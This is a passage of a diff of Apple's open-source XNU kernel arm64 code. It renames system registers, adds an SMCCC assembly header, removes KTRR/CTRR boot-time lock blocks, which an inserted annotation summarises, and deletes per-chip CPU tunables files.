                 * IPI to this CPU may be lost.  ISB is required to ensure the msr
                 * is retired before execution of cpu_signal_handler().
                 */
-               MSR(ARM64_REG_IPI_SR, ipi_sr);
+               MSR("S3_5_C15_C1_1", ipi_sr);
                __builtin_arm_isb(ISB_SY);
                cpu_signal_handler();
        } else
@@ -1844,6 +1861,7 @@ sleh_fiq(arm_saved_state_t *state)
                INTERRUPT_MASKED_DEBUG_END();
        }
 
+
        sleh_interrupt_handler_epilogue();
 #if MACH_ASSERT
        if (preemption_level != get_preemption_level()) {
diff --git a/osfmk/arm64/smccc_asm.h b/osfmk/arm64/smccc_asm.h
new file mode 100644 (file)
index 0000000..1f27d8d
--- /dev/null
@@ -0,0 +1,60 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#ifndef _ARM64_SMCCC_ASM_H_
+#define _ARM64_SMCCC_ASM_H_
+
+#ifndef __ASSEMBLER__
+#error "This header should only be used in .s files"
+#endif
+
+/*
+ * SAVE_SMCCC_CLOBBERED_REGISTERS
+ *
+ * Saves x0-x3 to stack in preparation for an hvc/smc call.
+ */
+
+.macro  SAVE_SMCCC_CLOBBERED_REGISTERS
+stp             x0, x1, [sp, #- 16]!
+stp             x2, x3, [sp, #- 16]!
+.endmacro
+
+/*
+ * LOAD_SMCCC_CLOBBERED_REGISTERS
+ *
+ * Loads x0-x3 from stack after an hvc/smc call.
+ */
+
+.macro  LOAD_SMCCC_CLOBBERED_REGISTERS
+ldp             x2, x3, [sp], #16
+ldp             x0, x1, [sp], #16
+.endmacro
+
+#endif /* _ARM64_SMCCC_ASM_H_ */
+
+/* vim: set ts=4 ft=asm: */
index 10d16d12204c42e7b4d3dd5e45ad3270c3281e02..5b64fbf5fd88a0b0fde0e862f1e9fd43173e5de4 100644 (file)
@@ -137,48 +137,6 @@ LEXT(reset_vector)
 #endif
 
 
-#if defined(KERNEL_INTEGRITY_KTRR)
-       /*
-        * Set KTRR registers immediately after wake/resume
-        *
-        * During power on reset, XNU stashed the kernel text region range values
-        * into __DATA,__const which should be protected by AMCC RoRgn at this point.
-        * Read this data and program/lock KTRR registers accordingly.
-        * If either values are zero, we're debugging kernel so skip programming KTRR.
-        */
-
-       /* refuse to boot if machine_lockdown() hasn't completed */
-       adrp    x17, EXT(lockdown_done)@page
-       ldr     w17, [x17, EXT(lockdown_done)@pageoff]
-       cbz     w17, .
-
-       // load stashed rorgn_begin
-       adrp    x17, EXT(ctrr_begin)@page
-       add             x17, x17, EXT(ctrr_begin)@pageoff
-       ldr             x17, [x17]
-#if DEBUG || DEVELOPMENT || CONFIG_DTRACE
-       // if rorgn_begin is zero, we're debugging. skip enabling ktrr
-       cbz             x17, Lskip_ktrr
-#else
-       cbz             x17, .
-#endif
-
-       // load stashed rorgn_end
-       adrp    x19, EXT(ctrr_end)@page
-       add             x19, x19, EXT(ctrr_end)@pageoff
-       ldr             x19, [x19]
-#if DEBUG || DEVELOPMENT || CONFIG_DTRACE
-       cbz             x19, Lskip_ktrr
-#else
-       cbz             x19, .
-#endif
-
-       msr             ARM64_REG_KTRR_LOWER_EL1, x17
-       msr             ARM64_REG_KTRR_UPPER_EL1, x19
-       mov             x17, #1
-       msr             ARM64_REG_KTRR_LOCK_EL1, x17
-Lskip_ktrr:
-#endif /* defined(KERNEL_INTEGRITY_KTRR) */
 
        // Process reset handlers
        adrp    x19, EXT(ResetHandlerData)@page                 // Get address of the reset handler data
@@ -203,62 +161,6 @@ Lnext_cpu_data_entry:
        b.eq    Lskip_cpu_reset_handler                         // Not found
        b               Lcheck_cpu_data_entry   // loop
 Lfound_cpu_data_entry:
-#if defined(KERNEL_INTEGRITY_CTRR)
-       /*
-        * Program and lock CTRR if this CPU is non-boot cluster master. boot cluster will be locked
-        * in machine_lockdown. pinst insns protected by VMSA_LOCK
-        * A_PXN and A_MMUON_WRPROTECT options provides something close to KTRR behavior
-        */
-
-       /* refuse to boot if machine_lockdown() hasn't completed */
-       adrp    x17, EXT(lockdown_done)@page
-       ldr     w17, [x17, EXT(lockdown_done)@pageoff]
-       cbz     w17, .
-
-       // load stashed rorgn_begin
-       adrp    x17, EXT(ctrr_begin)@page
-       add             x17, x17, EXT(ctrr_begin)@pageoff
-       ldr             x17, [x17]
-#if DEBUG || DEVELOPMENT || CONFIG_DTRACE
-       // if rorgn_begin is zero, we're debugging. skip enabling ctrr
-       cbz             x17, Lskip_ctrr
-#else
-       cbz             x17, .
-#endif
-
-       // load stashed rorgn_end
-       adrp    x19, EXT(ctrr_end)@page
-       add             x19, x19, EXT(ctrr_end)@pageoff
-       ldr             x19, [x19]
-#if DEBUG || DEVELOPMENT || CONFIG_DTRACE
-       cbz             x19, Lskip_ctrr
-#else
-       cbz             x19, .
-#endif
-
-       mrs             x18, ARM64_REG_CTRR_LOCK_EL1
-       cbnz    x18, Lskip_ctrr  /* don't touch if already locked */
-       msr             ARM64_REG_CTRR_A_LWR_EL1, x17
-       msr             ARM64_REG_CTRR_A_UPR_EL1, x19
-       mov             x18, #(CTRR_CTL_EL1_A_PXN | CTRR_CTL_EL1_A_MMUON_WRPROTECT)
-       msr             ARM64_REG_CTRR_CTL_EL1, x18
-       mov             x18, #1
-       msr             ARM64_REG_CTRR_LOCK_EL1, x18
-
-
-       isb
-       tlbi    vmalle1
-       dsb     ish
-       isb
-Lspin_ctrr_unlocked:
-       /* We should never get here: CPU start is serialized by cluster in cpu_start(),
-        * and the first core started in a cluster is designated cluster master and locks
-        * both core and cluster. Subsequent cores in the same cluster will run locked
-        * from the reset vector. */
-       mrs             x18, ARM64_REG_CTRR_LOCK_EL1
-       cbz             x18, Lspin_ctrr_unlocked
-Lskip_ctrr:
-#endif
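Both removed blocks above implement the same admission check before programming and locking the text-region protection registers: spin until machine_lockdown() has completed, load the stashed ctrr_begin/ctrr_end values, skip the programming on DEBUG/DEVELOPMENT/DTRACE kernels when either value is zero, and otherwise hang rather than boot unprotected. A minimal C-style sketch of that flow, assuming hypothetical ktrr_program()/ktrr_lock() helpers in place of the msr sequence:

    #include <stdint.h>

    extern uint64_t ctrr_begin, ctrr_end;  /* stashed by the cold-boot path */
    extern uint32_t lockdown_done;

    /* Hypothetical stand-ins for the msr writes in the assembly above. */
    extern void ktrr_program(uint64_t begin, uint64_t end);
    extern void ktrr_lock(void);

    static void
    program_ktrr_on_wake(void)
    {
            if (lockdown_done == 0) {
                    for (;;) {
                            /* refuse to boot until machine_lockdown() has run */
                    }
            }
            if (ctrr_begin == 0 || ctrr_end == 0) {
    #if DEBUG || DEVELOPMENT || CONFIG_DTRACE
                    return;         /* debug configuration: skip KTRR/CTRR */
    #else
                    for (;;) {
                            /* release kernels spin rather than run unprotected */
                    }
    #endif
            }
            ktrr_program(ctrr_begin, ctrr_end);
            ktrr_lock();
    }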
        adrp    x20, EXT(const_boot_args)@page
        add             x20, x20, EXT(const_boot_args)@pageoff
        ldr             x0, [x21, CPU_RESET_HANDLER]            // Call CPU reset handler
@@ -780,7 +682,7 @@ common_start:
 #if defined(APPLEHURRICANE)
        // <rdar://problem/26726624> Increase Snoop reservation in EDB to reduce starvation risk
        // Needs to be done before MMU is enabled
-       HID_INSERT_BITS ARM64_REG_HID5, ARM64_REG_HID5_CrdEdbSnpRsvd_mask, ARM64_REG_HID5_CrdEdbSnpRsvd_VALUE, x12
+       HID_INSERT_BITS HID5, ARM64_REG_HID5_CrdEdbSnpRsvd_mask, ARM64_REG_HID5_CrdEdbSnpRsvd_VALUE, x12
 #endif
 
 #if defined(BCM2837)
@@ -876,36 +778,26 @@ common_start:
 
 
 #if defined(APPLE_ARM64_ARCH_FAMILY)
-       // Initialization common to all Apple targets
+       // Initialization common to all non-virtual Apple targets
        ARM64_IS_PCORE x15
-       ARM64_READ_EP_SPR x15, x12, ARM64_REG_EHID4, ARM64_REG_HID4
+       ARM64_READ_EP_SPR x15, x12, S3_0_C15_C4_1, S3_0_C15_C4_0
        orr             x12, x12, ARM64_REG_HID4_DisDcMVAOps
        orr             x12, x12, ARM64_REG_HID4_DisDcSWL2Ops
-       ARM64_WRITE_EP_SPR x15, x12, ARM64_REG_EHID4, ARM64_REG_HID4
+       ARM64_WRITE_EP_SPR x15, x12, S3_0_C15_C4_1, S3_0_C15_C4_0
 #endif  // APPLE_ARM64_ARCH_FAMILY
 
        // Read MIDR before start of per-SoC tunables
        mrs x12, MIDR_EL1
 
-#if defined(APPLELIGHTNING)
-       // Cebu <B0 is deprecated and unsupported (see rdar://problem/42835678)
-       EXEC_COREEQ_REVLO MIDR_CEBU_LIGHTNING, CPU_VERSION_B0, x12, x13
-       b .
-       EXEC_END
-       EXEC_COREEQ_REVLO MIDR_CEBU_THUNDER, CPU_VERSION_B0, x12, x13
-       b .
-       EXEC_END
-#endif
-
        APPLY_TUNABLES x12, x13
 
 
 
 #if HAS_CLUSTER
        // Unmask external IRQs if we're restarting from non-retention WFI
-       mrs             x9, ARM64_REG_CYC_OVRD
+       mrs             x9, CPU_OVRD
        and             x9, x9, #(~(ARM64_REG_CYC_OVRD_irq_mask | ARM64_REG_CYC_OVRD_fiq_mask))
-       msr             ARM64_REG_CYC_OVRD, x9
+       msr             CPU_OVRD, x9
 #endif
 
        // If x21 != 0, we're doing a warm reset, so we need to trampoline to the kernel pmap.
diff --git a/osfmk/arm64/tunables/tunables.s b/osfmk/arm64/tunables/tunables.s
deleted file mode 100644 (file)
index fd67d00..0000000
+++ /dev/null
@@ -1,47 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-#include <pexpert/arm64/board_config.h>
-
-#if defined(APPLETYPHOON)
-#include "tunables_h7.s"
-#elif defined(APPLETWISTER)
-#include "tunables_h8.s"
-#elif defined(APPLEHURRICANE)
-#include "tunables_h9.s"
-#elif defined(APPLEMONSOON)
-#include "tunables_h10.s"
-#elif defined(APPLEVORTEX)
-#include "tunables_h11.s"
-#elif defined(APPLELIGHTNING)
-#include "tunables_h12.s"
-#elif defined(APPLEFIRESTORM)
-#include "tunables_h13.s"
-#else
-.macro APPLY_TUNABLES
-.endmacro
-#endif
diff --git a/osfmk/arm64/tunables/tunables_h10.s b/osfmk/arm64/tunables/tunables_h10.s
deleted file mode 100644 (file)
index e246200..0000000
+++ /dev/null
@@ -1,76 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-.macro APPLY_TUNABLES
-       /***** Tunables that apply to all cores, all revisions *****/
-
-       // <rdar://problem/28512310> SW WAR/eval: WKdm write ack lost when bif_wke_colorWrAck_XXaH asserts concurrently for both colors
-       HID_SET_BITS ARM64_REG_HID8, ARM64_REG_HID8_WkeForceStrictOrder, $1
-
-       /***** Tunables that apply to all P cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to all E cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to specific cores, all revisions *****/
-       EXEC_COREEQ_REVALL MIDR_SKYE_MISTRAL, $0, $1
-       // <rdar://problem/30423928>: Atomic launch eligibility is erroneously taken away when a store at SMB gets invalidated
-       HID_CLEAR_BITS ARM64_REG_EHID11, ARM64_REG_EHID11_SmbDrainThresh_mask, $1
-       EXEC_END
-
-       /***** Tunables that apply to specific cores and revisions *****/
-       EXEC_COREEQ_REVLO MIDR_SKYE_MISTRAL, CPU_VERSION_B0, $0, $1
-
-       // Disable downstream fill bypass logic
-       // <rdar://problem/28545159> [Tunable] Skye - L2E fill bypass collision from both pipes to ecore
-       HID_SET_BITS ARM64_REG_EHID5, ARM64_REG_EHID5_DisFillByp, $1
-
-       // Disable forwarding of return addresses to the NFP
-       // <rdar://problem/30387067> Skye: FED incorrectly taking illegal va exception
-       HID_SET_BITS ARM64_REG_EHID0, ARM64_REG_EHID0_nfpRetFwdDisb, $1
-
-       EXEC_END
-
-       EXEC_COREALL_REVLO CPU_VERSION_B0, $0, $1
-
-       // Disable clock divider gating
-       // <rdar://problem/30854420> [Tunable/Errata][cpu_1p_1e] [CPGV2] ACC power down issue when link FSM switches from GO_DN to CANCEL and at the same time upStreamDrain request is set.
-       HID_SET_BITS ARM64_REG_HID6, ARM64_REG_HID6_DisClkDivGating, $1
-
-       // Disable clock dithering
-       // <rdar://problem/29022199> [Tunable] Skye A0: Linux: LLC PIO Errors
-       HID_SET_BITS ARM64_REG_ACC_OVRD, ARM64_REG_ACC_OVRD_dsblClkDtr, $1
-       HID_SET_BITS ARM64_REG_ACC_EBLK_OVRD, ARM64_REG_ACC_OVRD_dsblClkDtr, $1
-
-       EXEC_END
-
-       EXEC_COREALL_REVHS CPU_VERSION_B0, $0, $1
-       // <rdar://problem/32512836>: Disable refcount syncing between E and P
-       HID_INSERT_BITS ARM64_REG_CYC_OVRD, ARM64_REG_CYC_OVRD_dsblSnoopTime_mask, ARM64_REG_CYC_OVRD_dsblSnoopPTime, $1
-       EXEC_END
-.endmacro
\ No newline at end of file
diff --git a/osfmk/arm64/tunables/tunables_h11.s b/osfmk/arm64/tunables/tunables_h11.s
deleted file mode 100644 (file)
index 9fb5b0d..0000000
+++ /dev/null
@@ -1,80 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-.macro APPLY_TUNABLES
-       /***** Tunables that apply to all cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to all P cores, all revisions *****/
-       EXEC_PCORE_REVALL $0, $1
-       // rdar://problem/34435356: segfaults due to IEX clock-gating
-       HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_rccForceAllIexL3ClksOn, $1
-
-       // Prevent ordered loads from being dispatched from LSU until all prior loads have completed.
-       // rdar://problem/34095873: AF2 ordering rules allow ARM device ordering violations
-       HID_SET_BITS ARM64_REG_HID4, ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd, $1
-
-       // rdar://problem/38482968: [Cyprus Tunable] Poisoned cache line crossing younger load is not redirected by older load-barrier
-       HID_SET_BITS ARM64_REG_HID3, ARM64_REG_HID3_DisColorOpt, $1
-
-       // rdar://problem/41056604: disable faster launches of uncacheable unaligned stores to workaround load/load ordering violation
-       HID_SET_BITS ARM64_REG_HID11, ARM64_REG_HID11_DisX64NTLnchOpt, $1
-
-       EXEC_END
-
-       /***** Tunables that apply to all E cores, all revisions *****/
-       EXEC_ECORE_REVALL $0, $1
-       // Prevent ordered loads from being dispatched from LSU until all prior loads have completed.
-       // rdar://problem/34095873: AF2 ordering rules allow ARM device ordering violations
-       HID_SET_BITS ARM64_REG_EHID4, ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd, $1
-
-       // rdar://problem/36595004: Poisoned younger load is not redirected by older load-acquire
-       HID_SET_BITS ARM64_REG_EHID3, ARM64_REG_EHID3_DisColorOpt, $1
-
-       // rdar://problem/37949166: Disable the extension of prefetcher training pipe clock gating, revert to default gating
-       HID_SET_BITS ARM64_REG_EHID10, ARM64_REG_EHID10_rccDisPwrSavePrfClkOff, $1
-
-       EXEC_END
-
-       /***** Tunables that apply to specific cores, all revisions *****/
-       // Should be applied to all Aruba variants, but only Cyprus variants B0 and later
-       EXEC_COREEQ_REVALL MIDR_ARUBA_VORTEX, $0, $1
-       // rdar://problem/36716477: data corruption due to incorrect branch predictor resolution
-       HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_enaBrKillLimit, $1
-       EXEC_END
-
-       /***** Tunables that apply to specific cores and revisions *****/
-       EXEC_COREEQ_REVHS MIDR_CYPRUS_VORTEX, CPU_VERSION_A1, $0, $1
-       // rdar://problem/36716477: data corruption due to incorrect branch predictor resolution
-       HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_enaBrKillLimit, $1
-       EXEC_END
-
-       EXEC_COREEQ_REVEQ MIDR_ARUBA_VORTEX, CPU_VERSION_A1, $0, $1
-       // rdar://problem/40695685: Enable BIF fill buffer stall logic to prevent skid buffer overflow (Aruba A1 only)
-       HID_SET_BITS ARM64_REG_HID5, ARM64_REG_HID5_EnableDnFIFORdStall, $1
-       EXEC_END
-.endmacro
\ No newline at end of file
diff --git a/osfmk/arm64/tunables/tunables_h12.s b/osfmk/arm64/tunables/tunables_h12.s
deleted file mode 100644 (file)
index 7b988d0..0000000
+++ /dev/null
@@ -1,100 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-.macro APPLY_TUNABLES
-       /***** Tunables that apply to all cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to all P cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to all E cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to specific cores, all revisions *****/
-       EXEC_COREEQ_REVALL MIDR_CEBU_LIGHTNING, $0, $1
-       // rdar://53907283 ([Cebu ACC Errata] Sibling Merge in LLC can cause UC load to violate ARM Memory Ordering Rules.)
-       HID_SET_BITS ARM64_REG_HID5, ARM64_REG_HID5_DisFill2cMerge, $1
-
-       // rdar://problem/54615539: [Cebu ACC Tunable] Cross-beat Crypto(AES/PMUL) ICache fusion is not disabled for branch unconditional recoded instruction.
-       HID_SET_BITS ARM64_REG_HID0, ARM64_REG_HID0_CacheFusionDisable, $1
-
-       // rdar://problem/50664291: [Cebu B0/B1 Tunables][PerfVerif][LSU] Post-silicon tuning of STNT widget contiguous counter threshold
-       HID_INSERT_BITS ARM64_REG_HID4, ARM64_REG_HID4_CnfCntrThresh_mask, ARM64_REG_HID4_CnfCntrThresh_VALUE, $1
-
-       // rdar://problem/47744434: Barrier Load Ordering property is not satisfied for x64-loads
-       HID_SET_BITS ARM64_REG_HID9, ARM64_REG_HID9_EnableFixBug47221499, $1
-
-       // rdar://problem/50664291: [Cebu B0/B1 Tunables][PerfVerif][LSU] Post-silicon tuning of STNT widget contiguous counter threshold
-       HID_SET_BITS ARM64_REG_HID9, ARM64_REG_HID9_DisSTNTWidgetForUnalign, $1
-
-       // rdar://problem/47865629: RF bank and Multipass conflict forward progress widget does not handle 3+ cycle livelock
-       HID_SET_BITS ARM64_REG_HID16, ARM64_REG_HID16_EnRs4Sec, $1
-       HID_CLEAR_BITS ARM64_REG_HID16, ARM64_REG_HID16_DisxPickRs45, $1
-       HID_SET_BITS ARM64_REG_HID16, ARM64_REG_HID16_EnMPxPick45, $1
-       HID_SET_BITS ARM64_REG_HID16, ARM64_REG_HID16_EnMPCyc7, $1
-
-       // Prevent ordered loads from being dispatched from LSU until all prior loads have completed.
-       // rdar://problem/34095873: AF2 ordering rules allow ARM device ordering violations
-       HID_SET_BITS ARM64_REG_HID4, ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd, $1
-
-       // rdar://problem/51690962: Disable Store-Non-Temporal downgrade widget
-       HID_SET_BITS ARM64_REG_HID4, ARM64_REG_HID4_DisSTNTWidget, $1
-
-       // rdar://problem/41056604: disable faster launches of uncacheable unaligned stores to workaround load/load ordering violation
-       HID_SET_BITS ARM64_REG_HID11, ARM64_REG_HID11_DisX64NTLnchOpt, $1
-
-       // rdar://problem/45024523: enable aggressive LEQ throttling to work around LEQ credit leak
-       HID_SET_BITS ARM64_REG_HID16, ARM64_REG_HID16_leqThrottleAggr, $1
-
-       // rdar://problem/41029832: configure dummy cycles to work around incorrect temp sensor readings on NEX power gating
-       HID_INSERT_BITS ARM64_REG_HID13, ARM64_REG_HID13_PreCyc_mask, ARM64_REG_HID13_PreCyc_VALUE, $1
-       EXEC_END
-
-       EXEC_COREEQ_REVALL MIDR_CEBU_THUNDER, $0, $1
-       // rdar://53907283 ([Cebu ACC Errata] Sibling Merge in LLC can cause UC load to violate ARM Memory Ordering Rules.)
-       HID_SET_BITS ARM64_REG_HID5, ARM64_REG_HID5_DisFill2cMerge, $1
-
-       // rdar://problem/48476033: Prevent store-to-load forwarding for UC memory to avoid barrier ordering violation
-       HID_SET_BITS ARM64_REG_EHID10, ARM64_REG_EHID10_ForceWStDrainUc, $1
-
-       // Prevent ordered loads from being dispatched from LSU until all prior loads have completed.
-       // rdar://problem/34095873: AF2 ordering rules allow ARM device ordering violations
-       HID_SET_BITS ARM64_REG_EHID4, ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd, $1
-
-       // rdar://problem/37949166: Disable the extension of prefetcher training pipe clock gating, revert to default gating
-       HID_SET_BITS ARM64_REG_EHID10, ARM64_REG_EHID10_rccDisPwrSavePrfClkOff, $1
-       EXEC_END
-
-       EXEC_COREEQ_REVALL MIDR_TURKS, $0, $1
-       // rdar://problem/53506680: [MP_CHECKER] Load STLFs from a completed UC/NC/NT store causing barrier ordering violation
-       HID_SET_BITS ARM64_REG_EHID10, ARM64_REG_EHID10_ForceWStDrainUc, $1
-       EXEC_END
-
-       /***** Tunables that apply to specific cores and revisions *****/
-       /* N/A */
-.endmacro
\ No newline at end of file
diff --git a/osfmk/arm64/tunables/tunables_h13.s b/osfmk/arm64/tunables/tunables_h13.s
deleted file mode 100644 (file)
index d6c12f2..0000000
+++ /dev/null
@@ -1,29 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-.macro APPLY_TUNABLES
-.endmacro
diff --git a/osfmk/arm64/tunables/tunables_h7.s b/osfmk/arm64/tunables/tunables_h7.s
deleted file mode 100644 (file)
index d239bb9..0000000
+++ /dev/null
@@ -1,57 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-.macro APPLY_TUNABLES
-       /***** Tunables that apply to all cores, all revisions *****/
-
-       // Disable LSP flush with context switch to work around bug in LSP
-       // that can cause Typhoon to wedge when CONTEXTIDR is written.
-       // <rdar://problem/12387704>
-       HID_SET_BITS ARM64_REG_HID0, ARM64_REG_HID0_LoopBuffDisb, $1
-       HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_rccDisStallInactiveIexCtl, $1
-       HID_SET_BITS ARM64_REG_HID3, ARM64_REG_HID3_DisXmonSnpEvictTriggerL2StarvationMode, $1
-       HID_CLEAR_BITS ARM64_REG_HID5, (ARM64_REG_HID5_DisHwpLd | ARM64_REG_HID5_DisHwpSt), $1
-
-       // Change the default memcache data set ID from 0 to 15 for all agents
